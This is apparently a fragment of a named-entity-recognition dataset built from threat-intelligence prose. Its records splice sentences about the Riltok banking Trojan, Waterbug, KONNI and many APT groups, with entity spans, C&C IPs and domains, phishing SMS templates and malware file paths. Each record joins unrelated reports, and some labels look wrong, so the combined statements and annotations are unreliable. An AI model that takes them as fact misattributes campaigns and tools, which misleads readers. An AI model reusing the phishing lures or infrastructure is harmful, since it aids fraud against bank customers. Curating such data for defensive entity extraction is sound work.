This new variant resembles parts of the Destover malware , which was used in the 2014 Sony Pictures attack .", "spans": [{"start": 52, "end": 56, "label": "Organization"}, {"start": 72, "end": 96, "label": "Indicator"}, {"start": 97, "end": 137, "label": "Indicator"}, {"start": 138, "end": 158, "label": "Indicator"}, {"start": 159, "end": 182, "label": "Indicator"}, {"start": 183, "end": 223, "label": "Indicator"}, {"start": 224, "end": 244, "label": "Indicator"}, {"start": 245, "end": 250, "label": "Organization"}, {"start": 360, "end": 368, "label": "Organization"}, {"start": 393, "end": 398, "label": "Organization"}, {"start": 399, "end": 421, "label": "Organization"}, {"start": 426, "end": 453, "label": "Organization"}, {"start": 501, "end": 503, "label": "Organization"}, {"start": 508, "end": 525, "label": "Organization"}, {"start": 568, "end": 576, "label": "Malware"}, {"start": 577, "end": 584, "label": "Malware"}]} {"text": "via Authorized App Store Impersonates security app on Google Play . Curiously though , Waterbug also compromised other computers on the victim\u2019s network using its own infrastructure . The Lazarus used a similar infrastructure to earlier threats , including the Destover backdoor variant known as Escad .", "spans": [{"start": 15, "end": 24, "label": "System"}, {"start": 54, "end": 65, "label": "System"}, {"start": 87, "end": 95, "label": "Organization"}, {"start": 167, "end": 181, "label": "Organization"}, {"start": 188, "end": 195, "label": "Organization"}, {"start": 261, "end": 278, "label": "Malware"}, {"start": 296, "end": 301, "label": "Malware"}]} {"text": "T1444 Masquerade as Legitimate Application Impersonates legitimate GAS Tecnologia application . Symantec believes that the variant of Mimikatz used in this attack is unique to Waterbug . 
The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 .", "spans": [{"start": 67, "end": 81, "label": "System"}, {"start": 96, "end": 104, "label": "Organization"}, {"start": 134, "end": 142, "label": "System"}, {"start": 176, "end": 184, "label": "Organization"}, {"start": 191, "end": 222, "label": "Organization"}, {"start": 260, "end": 282, "label": "Indicator"}]} {"text": "Discovery T1418 Application Discovery Sends list of installed apps on device . Aside from the attack involving Crambus infrastructure , this sample of Mimikatz has only been seen used in one other attack , against an education target in the UK in 2017 . The Advanced Threat Research team uncovered activity related to this campaign in March 2018 , when the actors targeted Turkish banks .", "spans": [{"start": 151, "end": 159, "label": "System"}, {"start": 217, "end": 226, "label": "Organization"}, {"start": 258, "end": 282, "label": "Organization"}, {"start": 357, "end": 363, "label": "Organization"}, {"start": 381, "end": 386, "label": "Organization"}]} {"text": "Impact T1516 Input Injection Can enter text and perform clicks on behalf of user . The first observed evidence of Waterbug activity came on January 11 , 2018 , when a Waterbug-linked tool (a task scheduler named msfgi.exe) was dropped on to a computer on the victim\u2019s network . KONNI : A Malware Under The Radar For Years .", "spans": [{"start": 114, "end": 122, "label": "Organization"}, {"start": 278, "end": 283, "label": "Malware"}, {"start": 306, "end": 311, "label": "System"}]} {"text": "Collection T1417 Input Capture Records user input data . In the case of the attack against the Middle Eastern target , Crambus was the first group to compromise the victim\u2019s network , with the earliest evidence of activity dating to November 2017 . 
Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years .", "spans": [{"start": 119, "end": 126, "label": "Organization"}, {"start": 249, "end": 254, "label": "Organization"}, {"start": 281, "end": 307, "label": "Malware"}]} {"text": "Command and Control T1437 Standard Application Layer Protocol Uses Firebase Cloud Messaging for C & C . Waterbug\u2019s intrusions on the victim\u2019s network continued for much of 2018 . During this time it has managed to avoid scrutiny by the security community .", "spans": [{"start": 104, "end": 114, "label": "Organization"}]} {"text": "Riltok mobile Trojan : A banker with global reach 25 JUN 2019 Riltok is one of numerous families of mobile banking Trojans with standard ( for such malware ) functions and distribution methods . Symantec did not observe the initial access point and the close timeframe between Waterbug observed activity on the victim\u2019s network and its observed use of Crambus infrastructure suggests that Waterbug may have used the Crambus infrastructure as an initial access point . The current version of the malware allows the operator to steal files , keystrokes , perform screenshots , and execute arbitrary code on the infected host .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 62, "end": 68, "label": "Malware"}, {"start": 195, "end": 203, "label": "Organization"}, {"start": 277, "end": 285, "label": "Organization"}, {"start": 389, "end": 397, "label": "Organization"}, {"start": 416, "end": 438, "label": "Organization"}]} {"text": "Originally intended to target the Russian audience , the banker was later adapted , with minimal modifications , for the European \u201c market. \u201d The bulk of its victims ( more than 90 % ) reside in Russia , with France in second place ( 4 % ) . It also reconfigures the Microsoft Sysinternals registry to prevent pop-ups when running the PsExec tool . 
Talos has named this malware KONNI .", "spans": [{"start": 335, "end": 346, "label": "System"}, {"start": 349, "end": 354, "label": "Organization"}, {"start": 378, "end": 383, "label": "Malware"}]} {"text": "Third place is shared by Italy , Ukraine , and the United Kingdom . Waterbug also used an older version of PowerShell , likely to avoid logging . Throughout the multiple campaigns observed over the last 3 years , the actor has used an email attachment as the initial infection vector .", "spans": [{"start": 68, "end": 76, "label": "Organization"}, {"start": 107, "end": 117, "label": "System"}]} {"text": "We first detected members of this family back in March 2018 . In one of these campaigns , Waterbug used a USB stealer that scans removable storage devices to identify and collect files of interest . They then use additional social engineering to prompt the target to open a .scr file , display a decoy document to the users , and finally execute the malware on the victim's machine .", "spans": [{"start": 90, "end": 98, "label": "Organization"}, {"start": 106, "end": 117, "label": "System"}, {"start": 274, "end": 278, "label": "Indicator"}]} {"text": "Like many other bankers , they were disguised as apps for popular free ad services in Russia . The malware then uses WebDAV to upload the RAR archive to a Box account . The malware infrastructure of the analysed samples was hosted by a free web hosting provider: 000webhost .", "spans": [{"start": 99, "end": 106, "label": "Malware"}, {"start": 117, "end": 123, "label": "System"}, {"start": 138, "end": 149, "label": "Malware"}]} {"text": "The malware was distributed from infected devices via SMS in the form \u201c % USERNAME % , I \u2019 ll buy under a secure transaction . 
The DeepSight Managed Adversary and Threat Intelligence (MATI) team co-authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug (aka Turla) cyber espionage group , and methods of detecting and thwarting activities of this adversary . The malware has evolved over time .", "spans": [{"start": 131, "end": 158, "label": "Organization"}, {"start": 163, "end": 182, "label": "Organization"}, {"start": 337, "end": 345, "label": "Organization"}, {"start": 374, "end": 379, "label": "Organization"}]} {"text": "youlabuy [ . The DeepSight MATI team authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug (aka Turla) cyber espionage group , and methods of detecting and thwarting activities of this adversary . In this article , we will analyse this evolution: at the beginning the malware was only an information stealer without remote administration , it moved from a single file malware to a dual file malware (an executable and a dynamic library ) , the malware has supported more and more features over the time , the decoy documents have become more and more advanced .", "spans": [{"start": 0, "end": 12, "label": "Indicator"}, {"start": 17, "end": 36, "label": "Organization"}, {"start": 176, "end": 184, "label": "Organization"}, {"start": 213, "end": 218, "label": "Organization"}, {"start": 514, "end": 529, "label": "System"}]} {"text": "] ru/7 * * * * * 3 \u201d or \u201c % USERNAME % , accept 25,000 on Youla youla-protect [ . While reviewing a 2015 report\u2075 of a Winnti intrusion at a Vietnamese gaming company , we identified a small cluster of Winnti\u2076 samples designed specifically for Linux\u2077 . 
The different versions contain copy/pasted code from previous versions .", "spans": [{"start": 64, "end": 81, "label": "Indicator"}, {"start": 118, "end": 124, "label": "Organization"}, {"start": 140, "end": 165, "label": "Organization"}, {"start": 201, "end": 208, "label": "Organization"}]} {"text": "] ru/4 * * * * * 7 \u201d , containing a link to download the Trojan . Following these reports , Chronicle researchers doubled down on efforts to try to unravel the various campaigns where Winnti was leveraged . Moreover the new version searches for files generated by previous versions .", "spans": [{"start": 92, "end": 101, "label": "Organization"}, {"start": 184, "end": 190, "label": "Organization"}]} {"text": "Other samples were also noticed , posing as a client of a ticket-finding service or as an app store for Android . Distinct changes to Azazel by the Winnti developers include the addition of a function named \u2018Decrypt2\u2019 , which is used to decode an embedded configuration similar to the core implant . This evolution is illustrated across 4 campaigns : one in 2014 , one in 2016 and finally two in 2017 .", "spans": [{"start": 104, "end": 111, "label": "System"}, {"start": 134, "end": 140, "label": "System"}, {"start": 148, "end": 165, "label": "Organization"}]} {"text": "It was late 2018 when Riltok climbed onto the international stage . Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits . The decoy document of the 2 last campaigns suggests that the targets are public organisations .", "spans": [{"start": 22, "end": 28, "label": "Malware"}, {"start": 68, "end": 75, "label": "Organization"}, {"start": 200, "end": 213, "label": "Vulnerability"}]} {"text": "The cybercriminals behind it kept the same masking and distribution methods , using names and icons imitating those of popular free ad services . 
We will see more from Zebrocy into 2019 on government and military related organizations . Both documents contained email addresses , phone numbers and contacts of members of official organizations such as United Nations , UNICEF , and Embassies linked to North Korea .", "spans": [{"start": 168, "end": 175, "label": "Organization"}, {"start": 189, "end": 199, "label": "Organization"}, {"start": 204, "end": 212, "label": "Organization"}, {"start": 262, "end": 267, "label": "System"}, {"start": 321, "end": 343, "label": "Organization"}, {"start": 352, "end": 366, "label": "Organization"}, {"start": 369, "end": 375, "label": "Organization"}, {"start": 382, "end": 391, "label": "Organization"}]} {"text": "In November 2018 , a version of the Trojan for the English market appeared in the shape of Gumtree.apk . The PowerShell script will look at the architecture of the system to check which malicious DLL files should be downloaded . In this campaign , the dropper filename was beauty.scr .", "spans": [{"start": 91, "end": 102, "label": "Indicator"}, {"start": 109, "end": 126, "label": "System"}, {"start": 186, "end": 205, "label": "Malware"}, {"start": 273, "end": 283, "label": "Indicator"}]} {"text": "The SMS message with a link to a banker looked as follows : \u201c % USERNAME % , i send you prepayment gumtree [ . In the same year , Silence conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans . Based on the compilation date of the two binaries , this campaign took place in September 2014 .", "spans": [{"start": 99, "end": 110, "label": "Indicator"}, {"start": 130, "end": 137, "label": "Organization"}, {"start": 171, "end": 183, "label": "System"}, {"start": 188, "end": 198, "label": "System"}]} {"text": "] cc/3 * * * * * 1 \u201d . \bThe FBI issued a rare bulletin admitting that a group named APT6 hacked into US government computer systems as far back as 2011 and for years stole sensitive data . 
Once executed , two files were dropped on the targeted system : a decoy document (a picture) and a fake svchost.exe binary .", "spans": [{"start": 28, "end": 31, "label": "Organization"}, {"start": 72, "end": 77, "label": "Organization"}, {"start": 84, "end": 88, "label": "Organization"}, {"start": 101, "end": 114, "label": "Organization"}, {"start": 293, "end": 304, "label": "Indicator"}]} {"text": "Italian ( Subito.apk ) and French ( Leboncoin.apk ) versions appeared shortly afterwards in January 2019 . \bFireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as Scarcruft and Group123 . Both files were stored in \"C:\\Windows\" .", "spans": [{"start": 10, "end": 20, "label": "Indicator"}, {"start": 36, "end": 49, "label": "Indicator"}, {"start": 107, "end": 122, "label": "Organization"}, {"start": 150, "end": 155, "label": "Organization"}, {"start": 206, "end": 215, "label": "Organization"}, {"start": 220, "end": 228, "label": "Organization"}, {"start": 257, "end": 269, "label": "Indicator"}]} {"text": "The messages looked as follows : \u201c % USERNAME % , ti ho inviato il soldi sul subito subito-a [ . \bTrend Micro attributes this activity to MuddyWater , an Iran-nexus actor that has been active since at least May 2017 . The fake svchost binary is the KONNI malware .", "spans": [{"start": 84, "end": 96, "label": "Indicator"}, {"start": 97, "end": 109, "label": "Organization"}, {"start": 138, "end": 148, "label": "Organization"}, {"start": 165, "end": 170, "label": "Organization"}, {"start": 249, "end": 254, "label": "Malware"}]} {"text": "] pw/6 * * * * * 5 \u201d ( It . \bFireEye assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper . 
The first task of the malware is to generate an ID to identify the infected system .", "spans": [{"start": 28, "end": 36, "label": "Organization"}, {"start": 53, "end": 59, "label": "Organization"}, {"start": 144, "end": 155, "label": "Organization"}]} {"text": ") \u201c % USERNAME % , ti ho inviato il pagamento subitop [ . FireEye has observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks . This ID is generated based on the installation date of the system .", "spans": [{"start": 46, "end": 57, "label": "Indicator"}, {"start": 58, "end": 65, "label": "Organization"}, {"start": 130, "end": 141, "label": "Organization"}]} {"text": "] pw/4 * * * * * 7 \u201d ( It . On Nov14 , 2017 , FireEye observed APT34 using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . The second task of malware is to ping the CC and get orders .", "spans": [{"start": 46, "end": 53, "label": "Organization"}, {"start": 63, "end": 68, "label": "Organization"}, {"start": 111, "end": 124, "label": "Vulnerability"}, {"start": 137, "end": 160, "label": "Organization"}]} {"text": ") \u201c % USERNAME % , je vous ai envoy\u00e9 un prepaiement m-leboncoin [ . Kaspersky reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013 . The malware includes 2 domains: phpschboy.prohosts.org , jams481.site.bz .", "spans": [{"start": 52, "end": 67, "label": "Indicator"}, {"start": 68, "end": 77, "label": "Organization"}, {"start": 91, "end": 96, "label": "Organization"}, {"start": 110, "end": 115, "label": "Organization"}, {"start": 218, "end": 240, "label": "Indicator"}, {"start": 243, "end": 258, "label": "Indicator"}]} {"text": "] top/7 * * * * * 3 \u201d ( Fr . APT33 is the only group that Kaspersky has observed use the DROPSHOT dropper . 
The developer used the Microsoft Winsocks API to handle the network connection .", "spans": [{"start": 29, "end": 34, "label": "Organization"}, {"start": 58, "end": 67, "label": "Organization"}, {"start": 89, "end": 105, "label": "System"}, {"start": 131, "end": 153, "label": "System"}]} {"text": ") \u201c % USERNAME % , j \u2019 ai fait l \u2019 avance ( suivi d \u2019 un lien ) : leboncoin-le [ . The cyber espionage group APT32 heavily obfuscates their backdoors and scripts , and Mandiant consultants observed APT32 implement additional command argument obfuscation in April 2017 . Surprisingly , this isn't the easiest or the most efficient technical choice for HTTP connection .", "spans": [{"start": 66, "end": 82, "label": "Indicator"}, {"start": 109, "end": 114, "label": "Organization"}, {"start": 140, "end": 149, "label": "System"}, {"start": 154, "end": 161, "label": "System"}, {"start": 198, "end": 203, "label": "Organization"}, {"start": 351, "end": 355, "label": "Indicator"}]} {"text": "] com/8 * * * * * 9 \u201d ( Fr . In all Mandiant investigations to date where the CARBANAK backdoor has been discovered , the activity has been attributed to the FIN7 threat group . The malware samples we analysed connected to only one URI: /login.php .", "spans": [{"start": 36, "end": 44, "label": "Organization"}, {"start": 158, "end": 162, "label": "Organization"}, {"start": 237, "end": 258, "label": "Indicator"}]} {"text": ") Let \u2019 s take a more detailed look at how this banking Trojan works . Kaspersky released a similar report about the same group under the name Carbanak in February 2015 . 
This version of KONNI is not designed to execute code on the infected system .", "spans": [{"start": 71, "end": 80, "label": "Organization"}, {"start": 122, "end": 127, "label": "Organization"}, {"start": 143, "end": 151, "label": "Organization"}, {"start": 187, "end": 192, "label": "Malware"}]} {"text": "Infection The user receives an SMS with a malicious link pointing to a fake website simulating a popular free ad service . FireEye assesses that APT32 leverages a unique suite of fully-featured malware . The purpose is to be executed only once and steal data on the infected system , here are the main features : Keyloggers , Clipboard stealer , Firefox profiles and cookies stealer , Chrome profiles and cookies stealer , Opera profiles and cookies stealer .", "spans": [{"start": 123, "end": 130, "label": "Organization"}, {"start": 346, "end": 353, "label": "Organization"}, {"start": 385, "end": 391, "label": "Organization"}, {"start": 423, "end": 428, "label": "Organization"}]} {"text": "There , they are prompted to download a new version of the mobile app , under which guise the Trojan is hidden . FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam\u2019s manufacturing , consumer products , and hospitality sectors . The name of the .scr file was directly linked to tension between North Korea and USA in March 2016 more information .", "spans": [{"start": 113, "end": 120, "label": "Organization"}, {"start": 134, "end": 139, "label": "Organization"}, {"start": 197, "end": 220, "label": "Organization"}, {"start": 223, "end": 240, "label": "Organization"}, {"start": 247, "end": 258, "label": "Organization"}, {"start": 285, "end": 289, "label": "Indicator"}]} {"text": "To be installed , it needs the victim to allow installation of apps from unknown sources in the device settings . 
The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on these backdoor families based on Mandiant investigations of APT32 intrusions . Based on the compilation dates of the binaries , the campaign took place in the same period .", "spans": [{"start": 118, "end": 125, "label": "Organization"}, {"start": 126, "end": 132, "label": "Organization"}, {"start": 229, "end": 237, "label": "Organization"}, {"start": 256, "end": 261, "label": "Organization"}]} {"text": "During installation , Riltok asks the user for permission to use special features in AccessibilityService by displaying a fake warning : If the user ignores or declines the request , the window keeps opening ad infinitum . FireEye assesses that APT32 is a cyber espionage group aligned with Vietnamese government interests . An interesting fact : the dropped library was compiled in 2014 and appears in our telemetry in August 2015 .", "spans": [{"start": 22, "end": 28, "label": "Malware"}, {"start": 223, "end": 230, "label": "Organization"}, {"start": 245, "end": 250, "label": "Organization"}, {"start": 291, "end": 301, "label": "Organization"}, {"start": 302, "end": 312, "label": "Organization"}]} {"text": "After obtaining the desired rights , the Trojan sets itself as the default SMS app ( by independently clicking Yes in AccessibilityService ) , before vanishing from the device screen . In May and June 2017 , FireEye has associated this campaign with APT19 , a group that we assess is composed of freelancers , with some degree of sponsorship by the Chinese government . 
Indicating that this library was probably used in another campaign .", "spans": [{"start": 208, "end": 215, "label": "Organization"}, {"start": 250, "end": 255, "label": "Organization"}, {"start": 260, "end": 265, "label": "Organization"}, {"start": 349, "end": 367, "label": "Organization"}]} {"text": "After enabling AccessibilityService , the malware sets itself as the default SMS app Now installed and having obtained the necessary permissions from the user , Riltok contacts its C & C server . APT10 is a Chinese cyber espionage group that FireEye has tracked since 2009 . The .scr file contains 2 Office documents .", "spans": [{"start": 161, "end": 167, "label": "Malware"}, {"start": 196, "end": 201, "label": "Organization"}, {"start": 242, "end": 249, "label": "Organization"}, {"start": 279, "end": 283, "label": "Indicator"}, {"start": 300, "end": 306, "label": "System"}]} {"text": "In later versions , when it starts , the Trojan additionally opens a phishing site in the browser that simulates a free ad service so as to dupe the user into entering their login credentials and bank card details . In addition to the spear phishes , FireEye ISIGHT Intelligence has observed APT10 accessing victims through global service providers . The first document was in English and a second in Russian .", "spans": [{"start": 251, "end": 278, "label": "Organization"}, {"start": 292, "end": 297, "label": "Organization"}]} {"text": "The entered data is forwarded to the cybercriminals . FireEye\u2019s visibility into the operations of APT28 \u2013 a group we believe the Russian government sponsors \u2013 has given us insight into some of the government\u2019s targets , as well as its objectives and the activities designed to further them . 
In the sample only the English version can be displayed to the user (that is hardcoded in the sample) .", "spans": [{"start": 54, "end": 63, "label": "Organization"}, {"start": 98, "end": 103, "label": "Organization"}, {"start": 129, "end": 147, "label": "Organization"}]} {"text": "Phishing page from the French version of the Trojan Communication with C & C Riltok actively communicates with its C & C server . FireEye has tracked and profiled APT28 group through multiple investigations , endpoint and network detections , and continuous monitoring . The Russian document is not used by the sample , we assume that the author of the malware forgot to remove the resource containing the Russia decoy document .", "spans": [{"start": 77, "end": 83, "label": "Malware"}, {"start": 130, "end": 137, "label": "Organization"}, {"start": 163, "end": 168, "label": "Organization"}]} {"text": "First off , it registers the infected device in the administrative panel by sending a GET request to the relative address gate.php ( in later versions gating.php ) with the ID ( device identifier generated by the setPsuedoID function in a pseudo-random way based on the device IMEI ) and screen ( shows if the device is active , possible values are \u201c on \u201d , \u201c off \u201d , \u201c none \u201d ) parameters . In April 2015 , FireEye uncovered the malicious efforts of APT30 , a suspected China-based threat group . 
The malware author changed the malware architecture , this version is divided in two binaries: conhote.dll , winnit.exe .", "spans": [{"start": 122, "end": 130, "label": "Indicator"}, {"start": 151, "end": 161, "label": "Indicator"}, {"start": 408, "end": 415, "label": "Organization"}, {"start": 451, "end": 456, "label": "Organization"}, {"start": 593, "end": 604, "label": "Indicator"}, {"start": 607, "end": 617, "label": "Indicator"}]} {"text": "Then , using POST requests to the relative address report.php , it sends data about the device ( IMEI , phone number , country , mobile operator , phone model , availability of root rights , OS version ) , list of contacts , list of installed apps , incoming SMS , and other information . FireEye iSIGHT Intelligence has been tracking a pair of cybercriminals that we refer to as the Vendetta Brothers . Another difference is the directory where the files are dropped , it's no longer C:\\Windows but rather the local setting of the current user (%USERPROFILE%\\Local Settings\\winnit\\winnit.exe) .", "spans": [{"start": 51, "end": 61, "label": "Indicator"}, {"start": 289, "end": 303, "label": "Organization"}, {"start": 384, "end": 401, "label": "Organization"}, {"start": 485, "end": 495, "label": "Indicator"}, {"start": 545, "end": 593, "label": "Indicator"}]} {"text": "From the server , the Trojan receives commands ( for example , to send SMS ) and changes in the configuration . Google and Microsoft have already confirmed the Russian hacker group APT28 used a Flash vulnerability CVE-2016-7855 along with this kernel privilege escalation flaw to perform a targeted attack . 
Thanks to this modification , the malware can be executed with a non-administrator account .", "spans": [{"start": 112, "end": 118, "label": "Organization"}, {"start": 123, "end": 132, "label": "Organization"}, {"start": 181, "end": 186, "label": "Organization"}, {"start": 214, "end": 227, "label": "Vulnerability"}]} {"text": "Trojan anatomy The family was named Riltok after the librealtalk-jni.so library contained in the APK file of the Trojan . McAfee concludes that some groups\u2014and especially the Poetry Group \u2014have shifted tactics to use Citadel in ways other than what it was originally intended for . The .dll file is executed by the .exe file .", "spans": [{"start": 36, "end": 42, "label": "Malware"}, {"start": 53, "end": 71, "label": "Indicator"}, {"start": 122, "end": 128, "label": "Organization"}, {"start": 182, "end": 187, "label": "Organization"}, {"start": 286, "end": 290, "label": "Indicator"}, {"start": 315, "end": 319, "label": "Indicator"}]} {"text": "The library includes such operations as : Get address of cybercriminal C & C server Get configuration file with web injects from C & C , as well as default list of injects Scan for app package names that generated AccessibilityEvent events in the list of known banking/antivirus/other popular apps Set malware as default SMS app Get address of the phishing page that opens when the app runs , and others getStartWebUrl function \u2013 get address of phishing page The configuration file contains a list of injects for mobile banking apps \u2013 links to phishing pages matching the mobile McAfee Advanced Threat research determines with confidence that Lazarus is the threat group behind this attack for the following reasons:Contacts an IP address / domain that was used to host a malicious document from a Lazarus previous campaign in 2017 . 
In this version , a shortcut is created in order to launch winnit.exe in the following path %USERPROFILE%\\Start Menu\\Programs\\Startup\\Anti virus service.lnk .", "spans": [{"start": 579, "end": 585, "label": "Organization"}, {"start": 643, "end": 650, "label": "Organization"}, {"start": 772, "end": 790, "label": "Malware"}, {"start": 798, "end": 805, "label": "Organization"}, {"start": 893, "end": 903, "label": "Indicator"}, {"start": 926, "end": 990, "label": "Indicator"}]} {"text": "banking app used by the user . In November 2017 , Talos observed the Group123 , which included a new version of ROKRAT being used in the latest wave of attacks . As you can see the attacker has went to great lengths to disguise his service as a legitimate Antivirus Service by using the name 'Anti virus service.lnk' .", "spans": [{"start": 50, "end": 55, "label": "Organization"}, {"start": 69, "end": 77, "label": "Organization"}, {"start": 256, "end": 273, "label": "System"}, {"start": 292, "end": 316, "label": "Indicator"}]} {"text": "In most so-called Western versions of the Trojan , the package names in the default configuration file are erased . In addition to TALOS investigation on KONNI , on July 18 2017 , BitDefender released a whitepaper on DarkHotel . This is of course simple but often it can be enough for a user to miss something malicious by name .", "spans": [{"start": 131, "end": 136, "label": "Organization"}, {"start": 217, "end": 226, "label": "Organization"}]} {"text": "Sample configuration file of the Trojan Through AccessibilityService , the malware monitors AccessibilityEvent events . According to security 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor . 
As in the previous version , the ID of the infected system is generated with exactly the same method .", "spans": [{"start": 142, "end": 172, "label": "Organization"}, {"start": 221, "end": 235, "label": "Malware"}]} {"text": "Depending on which app ( package name ) generated the event , Riltok can : Open a fake Google Play screen requesting bank card details Open a fake screen or phishing page in a browser ( inject ) mimicking the screen of the relevant mobile banking app and requesting user/bank card details Minimize the app ( for example , antivirus applications or device security settings ) Additionally , the Trojan can hide notifications from certain banking apps . ESET has also reported PowerShell scripts being used by Turla to provide direct , in-memory loading and execution of malware . The C2 is different and the analysed version this time only contains a single domain: dowhelsitjs.netau.net .", "spans": [{"start": 62, "end": 68, "label": "Malware"}, {"start": 87, "end": 98, "label": "System"}, {"start": 452, "end": 456, "label": "Organization"}, {"start": 475, "end": 493, "label": "System"}, {"start": 508, "end": 513, "label": "Organization"}, {"start": 583, "end": 585, "label": "System"}, {"start": 665, "end": 686, "label": "Indicator"}]} {"text": "List of package names of apps on events from which the Trojan opens a fake Google Play window ( for the Russian version of the Trojan ) Example of Trojan screen overlapping other apps When bank card details are entered in the fake window , Riltok performs basic validation checks : card validity period , number checksum , CVC length , whether the number is in the denylist sewn into the Trojan code : Examples of phishing pages imitating mobile banks At the time of writing , the functionality of most of the Western versions of Riltok Additionally Kaspersky identified a new backdoor that we attribute with medium confidence to Turla . 
In this version , the developer used a different API , the Wininet API which make more sense for Web requests .", "spans": [{"start": 75, "end": 86, "label": "System"}, {"start": 550, "end": 559, "label": "Organization"}, {"start": 577, "end": 585, "label": "Malware"}, {"start": 630, "end": 635, "label": "Organization"}, {"start": 697, "end": 708, "label": "System"}]} {"text": "was somewhat pared down compared to the Russian one . Researchers at Symantec suspect that Turla used the hijacked network to attack a Middle Eastern government . Moreover the C2 infrastructure evolved too , more .php files are available through the web hosting: /login.php /upload.php /download.php .", "spans": [{"start": 69, "end": 77, "label": "Organization"}, {"start": 150, "end": 160, "label": "Organization"}, {"start": 176, "end": 178, "label": "System"}, {"start": 213, "end": 217, "label": "Indicator"}, {"start": 263, "end": 284, "label": "Indicator"}, {"start": 285, "end": 307, "label": "Indicator"}, {"start": 308, "end": 332, "label": "Indicator"}]} {"text": "For example , the default configuration file with injects is non-operational , and the malware contains no fake built-in windows requesting bank card details . Symantec researchers have uncovered evidence that the Waterbug APT group has conducted a hostile takeover of an attack platform . This version includes the stealer features mentioned in the previous version and additionally Remote Administration Tool features such as file uploading/download and arbitrary command execution .", "spans": [{"start": 160, "end": 168, "label": "Organization"}, {"start": 214, "end": 222, "label": "Organization"}, {"start": 384, "end": 410, "label": "System"}]} {"text": "Conclusion Threats are better prevented than cured , so do not follow suspicious links in SMS , and be sure to install apps only from official sources and check what permissions you are granting during installation . 
Researchers at the Microstep Intelligence Bureau have published a report on targeted attacks on the Ukrainian government that they attribute to the Gamaredon threat actor . The library is only used to perform keylogging and clipboard stealing .", "spans": [{"start": 236, "end": 265, "label": "Organization"}, {"start": 317, "end": 337, "label": "Organization"}, {"start": 365, "end": 374, "label": "Organization"}]} {"text": "As Riltok shows , cybercriminals can apply the same methods of infection to victims in different countries with more or less the same success . Kaspersky found an active campaign by a Chinese APT group we call SixLittleMonkeys that uses a new version of the Microcin Trojan and a RAT that we call HawkEye as a last stager . Indeed , the malware author moved this part of the code from the core of the malware to a library .", "spans": [{"start": 3, "end": 9, "label": "Malware"}, {"start": 144, "end": 153, "label": "Organization"}, {"start": 210, "end": 226, "label": "Organization"}, {"start": 258, "end": 273, "label": "System"}, {"start": 280, "end": 283, "label": "System"}]} {"text": "Kaspersky products detect the above-described threat with the verdict Trojan-Banker.AndroidOS.Riltok . Trend Micro has previously reported the use of this malware in targeted attacks by the BlackTech group , primarily focused on cyber-espionage in Asia . 
An interesting element is that the malware looks for filenames created with the previous version of KONNI .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 70, "end": 100, "label": "Indicator"}, {"start": 103, "end": 114, "label": "Organization"}, {"start": 190, "end": 199, "label": "Organization"}, {"start": 355, "end": 360, "label": "Malware"}]} {"text": "IoCs C & C 100.51.100.00 108.62.118.131 172.81.134.165 172.86.120.207 185.212.128.152 185.212.128.192 185.61.000.108 185.61.138.108 185.61.138.37 188.209.52.101 5.206.225.57 alr992.date avito-app.pw backfround2.pw background1.xyz blacksolider93.com blass9g087.com brekelter2.com broplar3hf.xyz buy-youla.ru LuckyMouse activity detected by Palo Alto involved the attackers installing web shells on SharePoint servers to compromise government organizations in the Middle East . This implies that the malware targeted the same people as the previous version and they are designed to work together .", "spans": [{"start": 11, "end": 24, "label": "Indicator"}, {"start": 25, "end": 39, "label": "Indicator"}, {"start": 40, "end": 54, "label": "Indicator"}, {"start": 55, "end": 69, "label": "Indicator"}, {"start": 70, "end": 85, "label": "Indicator"}, {"start": 86, "end": 101, "label": "Indicator"}, {"start": 102, "end": 116, "label": "Indicator"}, {"start": 117, "end": 131, "label": "Indicator"}, {"start": 132, "end": 145, "label": "Indicator"}, {"start": 146, "end": 160, "label": "Indicator"}, {"start": 161, "end": 173, "label": "Indicator"}, {"start": 174, "end": 185, "label": "Indicator"}, {"start": 186, "end": 198, "label": "Indicator"}, {"start": 199, "end": 213, "label": "Indicator"}, {"start": 214, "end": 229, "label": "Indicator"}, {"start": 230, "end": 248, "label": "Indicator"}, {"start": 249, "end": 263, "label": "Indicator"}, {"start": 264, "end": 278, "label": "Indicator"}, {"start": 279, "end": 293, "label": "Indicator"}, {"start": 294, "end": 306, "label": "Indicator"}, {"start": 307, 
"end": 317, "label": "Organization"}, {"start": 339, "end": 348, "label": "Organization"}, {"start": 383, "end": 393, "label": "System"}, {"start": 430, "end": 454, "label": "Organization"}]} {"text": "cd78cg210xy0.com copsoiteess.com farmatefc93.org firstclinsop.com holebrhuhh3.com holebrhuhh45.com karambga3j.net le22999a.pw leboncoin-bk.top leboncoin-buy.pw leboncoin-cz.info leboncoin-f.pw leboncoin-jp.info leboncoin-kp.top leboncoin-ny.info leboncoin-ql.top leboncoin-tr.info Talos published its analysis of the BlackWater campaign , related to MuddyWater group . The malware internally uses the following files : solhelp.ocx sultry.ocx helpsol.ocx psltre.ocx screentmp.tmp (log file of the keylogger) spadmgr.ocx apsmgrd.ocx wpg.db .", "spans": [{"start": 0, "end": 16, "label": "Indicator"}, {"start": 17, "end": 32, "label": "Indicator"}, {"start": 33, "end": 48, "label": "Indicator"}, {"start": 49, "end": 65, "label": "Indicator"}, {"start": 66, "end": 81, "label": "Indicator"}, {"start": 82, "end": 98, "label": "Indicator"}, {"start": 99, "end": 113, "label": "Indicator"}, {"start": 114, "end": 125, "label": "Indicator"}, {"start": 126, "end": 142, "label": "Indicator"}, {"start": 143, "end": 159, "label": "Indicator"}, {"start": 160, "end": 177, "label": "Indicator"}, {"start": 178, "end": 192, "label": "Indicator"}, {"start": 193, "end": 210, "label": "Indicator"}, {"start": 211, "end": 227, 